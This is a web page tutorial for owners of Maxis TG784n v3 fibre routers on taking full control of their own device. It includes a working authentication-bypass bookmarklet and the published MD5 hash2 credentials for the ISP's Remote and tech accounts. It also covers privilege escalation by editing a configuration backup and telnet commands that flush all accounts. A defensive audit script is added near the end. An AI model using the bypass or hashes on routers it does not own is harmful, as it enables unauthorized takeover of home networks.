Maxis Fiber Passwords

From znarl.jobrate.org

This document will in no way assist you in breaking into Maxis connections illegally. These steps require physical access to perform. If you are looking for information on breaking into Maxis connections to steal bandwidth, please go somewhere else. Breaking into computer systems in Malaysia is illegal under the COMPUTER CRIMES ACT 1997.

This document describes reconfiguring your Maxis router in your home only.

Default Accounts on the TG784n v3 Maxis Router

There are four accounts by default. They are:

  • MaxisBB: default low-access account with no password.
  • Administrator: default access account; the password is the ACCESS KEY.
  • Remote: default remote administration account; end users don't normally have access to this account.
  • tech: default technical support account; end users don't normally have access to this account either.

MaxisBB and Administrator accounts do not have full access to the router, only the Remote and tech accounts do.

These accounts are for accessing the Maxis router only

If you wish to change the password for WiFi, you need to follow these steps. The WiFi password and the router accounts are different and control access to different things.

Adding a password to the “MaxisBB” account

Changing the MaxisBB account will not disable access for Maxis staff

You might want to create a backup before making changes. If you forget your password and the backup restore doesn't work, you can always factory reset the router to restore it.

Maxis default configuration does not include a password. This means anyone using your wireless or wired network who goes to http://192.168.1.254 will have access to your Maxis Fibre Router. They can change your passwords, settings or break your internet, spy on you, install software on your systems without your permission, etc. The Router administration page can be accessed over WiFi as well as Ethernet.

It is a good idea to set a password for the “MaxisBB” account to prevent it being misused. If you in future forget the password, doing a factory reset will return the “MaxisBB” username to having no password.

  • Using your browser, go to http://192.168.1.254
  • Without entering any user name or password you will automatically be logged in as user “MaxisBB”.
  • Select in the top left hand corner "MaxisBB"
  • A dialogue box will appear about the MaxisBB account – select “Change password”.
  • The “Old Password” needs to be left empty, put in your password in “New Password” and “Confirm New Password” fields


The Administrator account password is the “ACCESS KEY” printed on a label on your Maxis Router. It may be desirable to also change this password.

  • Again, using your browser, go to http://192.168.1.254
  • Login as MaxisBB with your new password
  • Select again in the top left hand corner "MaxisBB"
  • This time select “Switch to another user”.
  • Choose “Administrator” this time.
  • You will be asked for a password for the user account Administrator, enter the “ACCESS KEY” printed on the label on your router

Now every time you go to http://192.168.1.254 you will need to log in as either MaxisBB or Administrator with your password. The user account Administrator has a higher access level than MaxisBB.

Creating a new user with real administration powers

By gaining access to the Remote user, you can create a real administrator account that allows you to change the many advanced settings. Below are details of the Remote user and how to use it to increase your access and create a real administrator user of your own.

Logging in as user "Remote"

Maxis routers come configured with different levels of administration access: a "MaxisBB" user account that has no password, a second account called "Remote" that home users do not have access to, and a third account called "Administrator" with the password printed on a label on your Maxis router. The "Remote" account has a higher level of access than the "MaxisBB" and "Administrator" accounts and is required to change some of the settings on the Maxis router that the "MaxisBB" or "Administrator" account cannot.

Changing the password of the "Remote" and "Administrator" accounts means you will be disabling Maxis staff access to your router, possibly a good thing. I am not sure if Maxis keeps records of customer "Administrator" passwords but it is possible and reasonable to expect they do.

Gaining access to the Remote user account and creating a real administration account

There is a security flaw in the TG784n V3 that allows the encrypted (MD5) password to be entered instead of the unencrypted password to gain access to the device as the "Remote" user. Once logged in as "Remote", the password can be changed for this user. Please note that Maxis may at some point change the "Remote" user password, in which case its encrypted password will differ from the one below. You then need to get the new "Remote" encrypted password by logging in to the Maxis router with the "MaxisBB" account. The easiest way to do this is to create a backup of the TG784n V3 configuration and search it for "Remote" to find the new MD5.

Credit goes to forums.modem-help.co.uk for this information. (The website seems to be down as of the time of writing.)

Please note that an update has been released by Thomson to address these weaknesses. I would be interested to know if Maxis has fixed this issue on their router with the new update.

Important: changing the "Remote" or "tech" user account will mean Maxis support staff can no longer access your Maxis router. This may be desirable, depending on your level of trust of Maxis staff.

This needs to be done connected to either the WiFi access point or Ethernet port. It can not be done remotely without knowing the WiFi password.

Go to the Maxis Router Change Password page in a new window, normally done by clicking on the following link with the middle mouse button:

 http://192.168.1.254/ 

Highlight the following text completely

 javascript:(function(){var%20D=document;if(D.authform==undefined){alert("Are%20we%20on%20the%20same%20page?\nPlease%20open%20the%20routers%20login%20page%20and%20then%20run%20this%20bookmarklet!\nFor%20more%20info%20go%20to%20http://forums.modem-help.co.uk/viewtopic.php?t=1090");}else{var%20user,hash2;user=prompt("Give%20me%20the%20username!");if(user){var%20hash2=prompt("Can%20I%20have%20hash2%20value?");if(hash2){var%20HA2=MD5("GET"+":"+uri);D.getElementById("user").value=user;D.getElementById("hidepw").value=MD5(hash2+":"+nonce+":"+"00000001"+":"+"xyz"+":"+qop+":"+HA2);D.authform.submit();}else{alert("This%20won't%20work%20without%20correct%20input");}}}})();

Drag the highlighted javascript text to the tab of the new window opened with the Maxis User page. It will request a Username and password. Enter the following information:

 Username : Remote
 hash2 : 6e98f4d0679f0d4b3df3eb7452920daf

If successful, it will log you in as user Remote. Then it's simply a matter of creating a new username on the Maxis router of your choice with your own password.

Maxis Router User page

Screenshot of user administration


Second way of gaining root access

There is a second way to gain access to the device:

  • Create a user with a low access level and a known password.
  • Create a backup.
  • Modify the user.ini file in the backup configuration, changing the access of the user you just created to the same as Remote.
  • Do a configuration restore with the modified user.ini configuration backup.

More information on how to do it can be found here

Account configuration defaults on Maxis Router

These are the default account configurations on the Maxis router. I removed the hashed passwords of MaxisBB and Administrator as they are non-default.

 add name=MaxisBB password=_CYP2_[removed] role=User hash2=[removed] crypt=[removed] defuser=enabled
 add name=Administrator password=_CYP2_[removed] role=Administrator hash2=[changed] crypt=hyck3wklEXtyM
 add name=Remote password=_CYP2_337b3f6059e7b4cc5c88b8f71bbb34d6d42294e9bbe4d1d8 role=SuperUser hash2=6e98f4d0679f0d4b3df3eb7452920daf crypt=WREtaJ51l2Q0Y
 add name=tech password=_CYP2_05c817a3b379ef6d0d51259f4be6864b27d83d69743e09de role=TechnicalSupport hash2=fcf315201a5f40a26769142f3f32691f crypt=x7tuhJivLVO.M defremadmin=enabled

Disabling or removing this account stops Maxis from applying changes to your router with or without your knowledge. Both are MD5-hashed passwords and could be brute forced by someone who cares enough.

The MD5 hash is created using the following string and shouldn't be difficult to find.

 "[username]:Thomson Gateway:[password]"

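Because the router accepts hash2 in place of the password, a backup whose hash2 is still one of the values listed above carries a known credential. The following audit of a backup's account lines is an added example, not code from the original page or from Thomson or Maxis. The names `hash2`, `parse_users`, `audit` and `mine`, and the treatment of a missing password as an empty string, are assumptions; the sample lines are constructed.

```python
import hashlib
REALM = "Thomson Gateway"  # realm string quoted on this page
# hash2 values this page lists for the default Remote and tech accounts
PUBLISHED = {"6e98f4d0679f0d4b3df3eb7452920daf": "Remote",
             "fcf315201a5f40a26769142f3f32691f": "tech"}
FULL_ACCESS = {"SuperUser", "TechnicalSupport"}  # roles shown on this page

def hash2(user, password, realm=REALM):
    """MD5 of "[username]:Thomson Gateway:[password]", the format given above."""
    return hashlib.md5(f"{user}:{realm}:{password}".encode()).hexdigest()

def parse_users(text):
    """Yield the key=value fields of each 'add name=...' line as a dict."""
    for line in text.splitlines():
        tokens = line.split()
        if tokens and tokens[0] == "add":
            pairs = (t.split("=", 1) for t in tokens[1:] if "=" in t)
            yield {key: value.strip('"') for key, value in pairs}

def audit(text, mine=()):
    """Return {account: [findings]}; 'mine' names accounts the owner created."""
    report = {}
    for user in parse_users(text):
        name, digest = user.get("name", ""), user.get("hash2", "").lower()
        findings = []
        if digest == hash2(name, ""):  # assumption: no password is hashed as ""
            findings.append("empty password")
        if digest in PUBLISHED:
            findings.append(f"hash2 matches a default published for {PUBLISHED[digest]}")
        if user.get("role") in FULL_ACCESS and name not in mine:
            findings.append(f"full-access role {user['role']} not created by owner")
        if user.get("defremadmin") == "enabled":
            findings.append("defremadmin=enabled")  # flag as it appears on this page
        if findings:
            report[name] = findings
    return report

# Constructed sample: Remote/tech hash2 are the values quoted on this page; the rest is made up.
SAMPLE = "\n".join([
    f"add name=MaxisBB role=User hash2={hash2('MaxisBB', '')} defuser=enabled",
    "add name=Remote role=SuperUser hash2=6e98f4d0679f0d4b3df3eb7452920daf",
    "add name=tech role=TechnicalSupport hash2=fcf315201a5f40a26769142f3f32691f"
    " defremadmin=enabled",
    f"add name=owner role=SuperUser hash2={hash2('owner', 'constructed-passphrase')}",
])

if __name__ == "__main__":
    for name, findings in audit(SAMPLE, mine={"owner"}).items():
        print(f"{name}: {'; '.join(findings)}")
```

An empty report for an account means none of these checks fired, not that its password is strong.
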
Disabling other Maxis Accounts on your router

This step removes ALL accounts and replaces them with your own account only. Doing a factory reset on your router will recover the accounts, as will restoring a backup.

Log in to the router using Telnet:

 telnet 192.168.1.254

Username: Administrator
Password: (<ACCESS KEY>) (on router label)

Screenshot of telneting into the router and entering the username and password

Issue the following commands:

 :user flush
 :user add name="my-user-name" password="my-password" role=SuperUser 
 :saveall

Logout.

Test that your new account works by logging in to the web interface:

 http://192.168.1.254

Log in to your router with the username and password entered above to ensure you still have full control of the device.

You can then view which accounts exist using the web interface:

http://192.168.1.254/cgi/b/users/ov/?be=0&l0=3&l1=9

Screenshot of user administration
